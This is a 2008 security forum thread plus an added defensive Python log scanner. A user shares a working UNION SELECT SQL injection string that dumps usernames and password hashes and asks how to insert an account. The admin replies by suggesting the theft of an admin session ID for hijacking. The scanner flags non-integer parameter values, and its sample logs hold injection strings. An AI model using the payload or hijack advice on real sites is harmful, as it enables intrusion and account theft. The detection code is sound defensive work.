IT Security and Insecurity Portal

how to Do Insert

fadai (Regular user, Joined: Oct 30, 2008, Posts: 11)
Posted: Fri Oct 31, 2008 7:47 pm

Code:
pages.php?pId=-1'+UNION+SELECT+ALL+1,UNHEX(HEX(CONCAT(username,0x5e,password,0x5e))),3,4,UNHEX(HEX(username)),6+from+ias_users--+
 
 
Gives me the MD5 hash and username. I am unable to crack the hash.

So can someone tell me how to INSERT a username and password?

waraxe (Site admin, Joined: May 11, 2004, Posts: 2407, Location: Estonia, Tartu)
Posted: Fri Oct 31, 2008 7:55 pm

In case of MySQL you can INSERT only if injection occurs in an INSERT query, UPDATE is possible in a vulnerable UPDATE query and so on ... But I suggest to search for a possible sessions table in the database. Some websites are based purely on PHP session management, but many others are using their own session handling. So if you find the session table and can fetch the admin's session ID, then session hijack may be possible, if there are no other security measures (like fixation to IP) in place ...
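
A defender's view of the request shown in the first post, as an added example that is not part of the thread: a Python scan of web access logs that flags every `pId` value that is not a plain integer. The log lines are constructed, and treating `pId` as a non-negative integer page id is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not taken from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [31/Oct/2008:19:40:02 +0000] "GET /pages.php?pId=12 HTTP/1.1" 200 5120
203.0.113.9 - - [31/Oct/2008:19:41:10 +0000] "GET /pages.php?pId=-1'+UNION+SELECT+ALL+1,2,3,4,5,6+from+ias_users--+ HTTP/1.1" 200 734
203.0.113.9 - - [31/Oct/2008:19:41:55 +0000] "GET /pages.php?pId=12%27 HTTP/1.1" 200 698
198.51.100.4 - - [31/Oct/2008:19:42:30 +0000] "GET /pages.php?pId=abc HTTP/1.1" 200 640
198.51.100.4 - - [31/Oct/2008:19:43:01 +0000] "GET /index.php?q=union+select+committee HTTP/1.1" 200 2210
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Secondary hint only: quote, comment markers, or UNION ... SELECT in the value.
SQL_HINTS = re.compile(r"\bunion\b.*\bselect\b|--|/\*|'", re.I)

def check_line(line, param="pId"):
    """Return None for a clean line, else a finding dict for this request."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    # parse_qs decodes %xx and '+', so encoded and plain forms compare equal.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get(param, []):
        # Allowlist: the parameter must be 1-10 digits and nothing else.
        if not re.fullmatch(r"\d{1,10}", value):
            return {"ip": ip, "status": int(status), "value": value,
                    "sql_syntax": bool(SQL_HINTS.search(value))}
    return None

def scan(log_text, param="pId"):
    """Check every log line and keep only the findings."""
    results = (check_line(line, param) for line in log_text.splitlines())
    return [r for r in results if r]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Checking the type of the one parameter, instead of searching every request for SQL keywords, keeps the last sample line (a search for "union select committee") from raising a false alarm. The same integer check belongs in the application before the value reaches the query, together with a bound parameter.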

All times are GMT